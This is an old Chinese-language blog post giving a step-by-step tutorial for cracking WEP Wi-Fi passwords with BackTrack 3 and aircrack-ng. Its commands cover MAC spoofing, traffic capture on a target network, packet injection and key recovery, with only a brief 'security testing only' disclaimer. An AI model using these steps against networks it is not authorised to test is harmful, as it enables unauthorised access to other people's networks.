Chinaunix首页 | 论坛 | 博客

qsh

  • 博客访问: 3943739
  • 博文数量: 1015
  • 博客积分: 15904
  • 博客等级: 上将
  • 技术积分: 8572
  • 用 户 组: 普通用户
  • 注册时间: 2008-07-04 19:16
文章分类

全部博文(1015)

文章存档

2019年(1)

2017年(1)

2016年(19)

2015年(27)

2014年(30)

2013年(95)

2012年(199)

2011年(72)

2010年(109)

2009年(166)

2008年(296)

分类:

2009-10-18 13:05:30

 

家庭测试通过,此为安全检测使用,请勿用此从事非法活动,切记!

参考:

1、安装BT3硬盘版
1.1 将BT3光盘镜像解压至任一分区根目录(这里假设放在D:\根目录下)
1.2 将bt3.xpm、FONTS、GRBT3这三个文件拷至系统分区(假定为C盘)
1.3 设置boot.ini
右键“我的电脑”-属性-高级-设置-编辑,添加代码
C:\GRBT3=START BT3

2、启动BT3
2.1 重启计算机,启动时选择Start BT3
2.2 从BT3启动菜单中选择启动D盘BT3

3、准备WIFI网卡
# modprobe –r iwl3945
# modprobe ipwraw
# iwconfig (查看无线网卡名称,这里假定为wifi0)
——————————————————–
##### 这里等同于iwconfig
locate airoscript (查看airoscript.sh位置)
# cd /usr/local/wicrawl/plugins/aircrack-wep-cracking/aircrack-ng-

0.9.1/airoscript/
# airoscript.sh
# 输入1 1 4(这一步选择WEP) 1
——————————————————–
# airmon-ng stop wifi0 (停用无线接口)
# ifconfig wifi0 down
# macchanger –mac 00:11:22:33:44:55 wifi0 (修改当前无线网卡MAC地址)
# airmon-ng start wifi0 (启用无线网卡)

4、连接到目标
# airodump-ng wifi0
# airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device]
(# airodump-ng -c 2 -w js2.out –bssid [bssid] wifi0)
(输入数据被导到test.out文件中,在后面将使用)

打开一个新的shell
# aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]
(aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device])
用来产生一些伪造的数据包来加速数据的输出。
# airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66
迫使AP发出大量在破解WEP时可能会用到的数据包。
大收到大约10,000-20,000的数据包时就可以尝试破解WEP了。

再打开一个新的shell
# aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h

00:11:22:33:44:66 [device]
Use this packet ? y
Sent 10054 packets…(460pps)

当你得到了足够的包之后,就可以开始破解:
# aircrack-ng -n 128 -b [bssid] [filename]-01.cap
filename —- 为上面的test
“-n 128″ —-
代表128位WEP,如若失败,则尝试将128改成64,试试64位的。

成功后,可以看到:Key Found!的字样
后面接着的就是密码,形式为:00:13:22:33:44
那密码即为:0013223344。

至此,破解结束。

阅读(1848) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~